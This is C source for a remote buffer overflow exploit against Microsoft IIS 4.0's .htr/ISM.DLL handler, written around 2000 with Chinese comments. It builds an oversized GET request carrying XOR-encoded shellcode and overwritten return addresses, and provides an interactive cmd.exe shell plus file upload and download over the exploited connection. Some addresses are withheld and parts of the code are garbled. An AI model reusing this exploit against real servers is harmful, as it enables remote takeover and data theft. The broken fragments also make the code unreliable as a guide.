| IIS4.0的.htr映射ism.dll溢出攻击程序
编写:yuange(yuange@nsfocus.com)
本程序实现所有语言版本WINDOWS下的溢出攻击。SHELLCODE代码实现绑定cmd.exe功能,实现上传下传文件的ftp功能,实现加密传输功能,不开端口、不开服务,可以绕过防火墙等。独创的实现源代码编写shellcode的办法,可以方便编写、修改、调试shellcode,使得编写强大功能的shellcode成为可能。也解决了溢出攻击的几个根本问题:
1、溢出点确定;2、shellcode定位; 3、jmp esp功能代码地址确定;4、WINDOWS的API调用地址版本相关问题。另一个版本实现了接管WWW功能,可以实现不修改WEB页面文件的情况下替换所有WEB页面。一般的溢出攻击程序也可以使用这个框架
程序在vc6.0下编译通过
iis4。0 overflow program ver 1.0
copy by yuange 2000。05。8
#include
#include
#include
#include
#define FNENDLONG 0x08
#define NOPCODE 'B' // INC EDX 0x90
#define NOPLONG 0x50
#define BUFFSIZE 0x20000
#define PATHLONG 0x12
// c:\inetpub\wwwroot 物理路径长度。
// 因为WWW处理GET /的时候前面要加物理路径,再传递给ISM.DLL处理,所以溢出点与物理路径有
// 关。可以先用.IDC,.ida,.idq泄露物理路径的办法得到物理路径长度
#define RETEIPADDRESS 0xxxxx-PATHLONG+4+4
#define ADD1 0xxxx-0xxxxx-PATHLONG+4
#define ADD2 0xxxxx-0xxxxx-PATHLONG+4
/* 由于一些原因,这儿数据不提供 2000.10.25 */
// 两个要处理的参数地址,参见后面ISM.DLL有问题代码的注释
#define SHELLBUFFSIZE 0x800
#define SHELLFNNUMS 12
#define DATAXORCODE 0xAA
#define LOCKBIGNUM 19999999
#define LOCKBIGNUM2 13579139
#define WEBPORT 80
void shellcodefnlock();
void shellcodefn(char *ecb);
void cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd
,int len);
void iisput(int fd,char *str);
void iisget(int fd,char *str);
int newrecv(int fd,char *buff,int size,int flag);
int newsend(int fd,char *buff,int size,int flag);
int xordatabegin;
int lockintvar1,lockintvar2;
char lockcharvar;
int main(int argc, char **argv)
{
char *server;
char *str="LoadLibraryA""\x0""CreatePipe""\x0"
"CreateProcessA""\x0""CloseHandle""\x0"
"PeekNamedPipe""\x0"
"ReadFile""\x0""WriteFile""\x0"
"CreateFileA""\x0"
"GetFileSize""\x0"
"GetLastError""\x0"
"Sleep""\x0"
"cmd.exe""\x0""\x0d\x0a""exit""\x0d\x0a""\x0"
"XORDATA""\x0"
"strend";
char buff1[]="GET /""\xff""default.htr/";
char buff2[]=".HTR HTTP/1.1 \nHOST:";
char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
char SRLF[]="\x0d\x0a\x00\x00";
char eipexcept1[] ="\xxx\xxx\xxx\xxx";
// char eipexcept[] ="\xxx\xxx\xxx\xxx";
// ret
char eipexcept[]="\xxx\xxx\xxx\xxx";
char eipwinnt[] ="\xxx\xxx\xxx\xxx";
char eipwinnt2[]="\xxx\xxx\xxx\xxx";
char reteax[] ="\xxx\xxx\xxx\xxx";
由于一些原因,这儿数据不提供 2000.10.25
char eipjmpshell[]="\x90\x90\x90\x90\xff\x63\x64";
char buff[BUFFSIZE];
char recvbuff[BUFFSIZE];
char shellcodebuff[0x1000];
struct sockaddr_in s_in2,s_in3;
struct hostent *he;
char *shellcodefnadd,*chkespadd;
unsigned int sendpacketlong;
int i,j,k;
unsigned char temp;
int fd;
u_short port,port1,shellcodeport;
SOCKET d_ip;
WSADATA wsaData;
int offset=0;
int OVERADD=RETEIPADDRESS;
int result;
fprintf(stderr,"\n IIS4.0 OVERFLOW PROGRAM 2.0 .");
fprintf(stderr,"\n copy by yuange(yuange@nsfocus.com) 2000.6.2.");
fprintf(stderr,"\n welcome to my homepage http://yuange.yeah.net
.");
fprintf(stderr,"\n welcome to http://www.nsfocus.com .");
fprintf(stderr,"\n usage: %s [offset] [webport] \n", argv[0]);
if(argc <2){
fprintf(stderr,"\n please enter the web server:");
gets(recvbuff);
for(i=0;i if(recvbuff!=' ') break;
}
server=recvbuff;
if(i
fprintf(stderr,"\n please enter the offset(0-3):");
gets(buff);
for(i=0;i if(buff!=' ') break;
}
offset=atoi(buff+i);
}
result= WSAStartup(MAKEWORD(1, 1), &wsaData);
if (result != 0) {
fprintf(stderr, "Your computer was not connected "
"to the Internet at the time that "
"this program was launched, or you "
"do not have a 32-bit "
"connection to the Internet.");
exit(1);
}
if(argc>2){
offset=atoi(argv[2]);
}
OVERADD+=offset;
/*
if(offset<0||offset>3){
fprintf(stderr,"\n offset error !offset 0 - 3 .");
gets(buff);
exit(1);
}
if(argc <2){
// WSACleanup( );
// exit(1);
}
else server = argv[1];
for(i=0;i if(server!=' ')
break;
}
if(i
for(i=0;i+3 if(server==':'){
if(server[i+1]=='\\'||server[i+1]=='/'){
if(server[i+2]=='\\'||server[i+2]=='/'){
server+=i;
server+=3;
break;
}
}
}
}
for(i=1;i<=strlen(server);++i){
if(server[i-1]=='\\'||server[i-1]=='/') server[i-1]=0;
}
d_ip = inet_addr(server);
if(d_ip==-1){
he = gethostbyname(server);
if(!he)
{
WSACleanup( );
printf("\n Can't get the ip of %s !\n",server);
gets(buff);
exit(1);
}
else memcpy(&d_ip, he->h_addr, 4);
}
if(argc>3) port=atoi(argv[3]);
else port=WEBPORT;
if(port==0) port=WEBPORT;
fd = socket(AF_INET, SOCK_STREAM,0);
i=8000;
setsockopt(fd,SOL_SOCKET,SO_RCVTIMEO,(const char *) &i,sizeof(i));
s_in3.sin_family = AF_INET;
s_in3.sin_port = htons(port);
s_in3.sin_addr.s_addr = d_ip;
printf("\n nuke ip: %s port
%d",inet_ntoa(s_in3.sin_addr),htons(s_in3.sin_port));
if(connect(fd, (struct sockaddr *)&s_in3, sizeof(struct
sockaddr_in))!=0) {
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n connect err.");
gets(buff);
exit(1);
}
_asm{
mov ESI,ESP
cmp ESI,ESP
}
_chkesp();
chkespadd=_chkesp;
temp=*chkespadd;
if(temp==0xe9) {
++chkespadd;
i=*(int*)chkespadd;
chkespadd+=i;
chkespadd+=4;
}
shellcodefnadd=shellcodefnlock;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x500;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memset(buff,NOPCODE,BUFFSIZE);
if(argc>4){
memcpy(buff,argv[4],strlen(argv[4]));
}
else memcpy(buff,buff1,strlen(buff1));
memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);
shellcodefnadd=shellcodefn;
temp=*shellcodefnadd;
if(temp==0xe9) {
++shellcodefnadd;
k=*(int *)shellcodefnadd;
shellcodefnadd+=k;
shellcodefnadd+=4;
}
for(k=0;k<=0x1000;++k){
if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
}
memcpy(shellcodebuff,shellcodefnadd,k);
cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
for(i=0;i<0x400;++i){
if(memcmp(str+i,"strend",6)==0) break;
}
memcpy(shellcodebuff+k,str,i);
sendpacketlong=k+i;
for(k=0;k<=0x200;++k){
if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
}
for(i=0;i temp=shellcodebuff;
temp^=DATAXORCODE;
if(temp<=0x10||temp=='
'||temp=='.'||temp=='/'||temp=='\\'||temp=='0'||temp=='?'||temp=='%'){
buff[OVERADD+NOPLONG+k]='0';
++k;
temp+=0x40;
}
buff[OVERADD+NOPLONG+k]=temp;
++k;
}
// memcpy(buff+OVERADD+NOPLONG+k,shellcodebuff,sendpacketlong);
// k+=sendpacketlong;
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+ADD1+offset+i,eipexcept,4);
memcpy(buff+ADD2+offset+i,eipexcept,4);
}
for(i=-0x30;i<0x30;i+=4){
memcpy(buff+OVERADD+i,eipexcept,4);
}
memcpy(buff+OVERADD+i,eipwinnt2,4);
memcpy(buff+OVERADD+i+4,reteax,4);
memcpy(buff+OVERADD+i+8,eipwinnt,4);
memcpy(buff+OVERADD+i+0x0c,eipwinnt,4);
memcpy(buff+OVERADD+i+0x10,eipjmpshell,7);
// fprintf(stderr,"\n send:\n %s",buff);
fprintf(stderr,"\n offset:%d",offset);
if(argc>2){
server=argv[2];
if(strcmp(server,"win9x")==0){
memcpy(buff+OVERADD,eipwin9x,4);
fprintf(stderr,"\n nuke win9x.");
}
if(strcmp(server,"winnt")==0){
memcpy(buff+OVERADD,eipwinnt,4);
fprintf(stderr,"\n nuke winnt.");
}
}
sendpacketlong=k+OVERADD+NOPLONG;
strcpy(buff+sendpacketlong,buff2);
strcpy(buff+sendpacketlong+strlen(buff2),server);
strcpy(buff+sendpacketlong+strlen(buff2)+strlen(server),"\n\n");
// printf("\n send buff:\n%s",buff);
// strcpy(buff+OVERADD+NOPLONG,shellcode);
sendpacketlong=strlen(buff);
#ifdef DEBUG
_asm{
lea esp,buff
add esp,OVERADD
ret
}
#endif
if(argc>6){
if(strcmp(argv[6],"debug")==0){
_asm{
lea esp,buff
add esp,OVERADD
ret
}
}
}
xordatabegin=0;
for(i=0;i<1;++i){
j=sendpacketlong;
fprintf(stderr,"\n send packet %d bytes.",j);
send(fd,buff,j,0);
k=newrecv(fd,recvbuff,0x1000,0);
if(k>=8&&memcmp(recvbuff,"XORDATA",8)==0) {
xordatabegin=1;
k=-1;
fprintf(stderr,"\n ok!\n");
}
if(k>0){
recvbuff[k]=0;
fprintf(stderr,"\n recv:\n %s",recvbuff);
}
}
k=1;
ioctlsocket(fd, FIONBIO, &k);
// fprintf(stderr,"\n now begin: \n");
lockintvar1=LOCKBIGNUM2%LOCKBIGNUM;
lockintvar2=lockintvar1;
k=1;
while(k!=0){
if(k<0){
i=0;
while(i==0){
gets(buff);
if(memcmp(buff,"iisput",6)==0){
iisput(fd,buff+6);
}
else{
if(memcmp(buff,"iisget",6)==0){
iisget(fd,buff+6);
}
else i=1;
}
}
k=strlen(buff);
memcpy(buff+k,SRLF,3);
newsend(fd,buff,k+2,0);
}
k=newrecv(fd,buff,0x1000,0);
if(xordatabegin==0&&k>=8&&memcmp(buff,"XORDATA",8)==0){
xordatabegin=1;
k=-1;
}
if(k>0){
buff[k]=0;
fprintf(stderr,"%s",buff);
}
// if(k==0) break;
}
closesocket(fd);
WSACleanup( );
fprintf(stderr,"\n the server close connect.");
gets(buff);
return(0);
}
void shellcodefnlock()
{
_asm{
nop
nop
nop
nop
nop
nop
nop
nop
_emit('?')
xor ecx,ecx
add si,474h
cmp dword ptr [esi],ecx
jnz getesi
add si,4
getesi: mov esi,[esi]
add si,8
xor ecx,ecx
mov byte ptr [esi],cl
jmp next
getediadd: pop EDI
push EDI
pop ESI
push ebx // ecb
push ebx // call shellcodefn ret address
xor ecx,ecx
looplock: lodsb
cmp al,cl
jz shell
cmp al,0x30
jz clean0
sto: xor al,DATAXORCODE
stosb
jmp looplock
clean0: lodsb
sub al,0x40
jmp sto
next: call getediadd
shell: NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
}
}
(生如夏花之绚丽,死如秋叶之静美。)呵呵。。。。
|
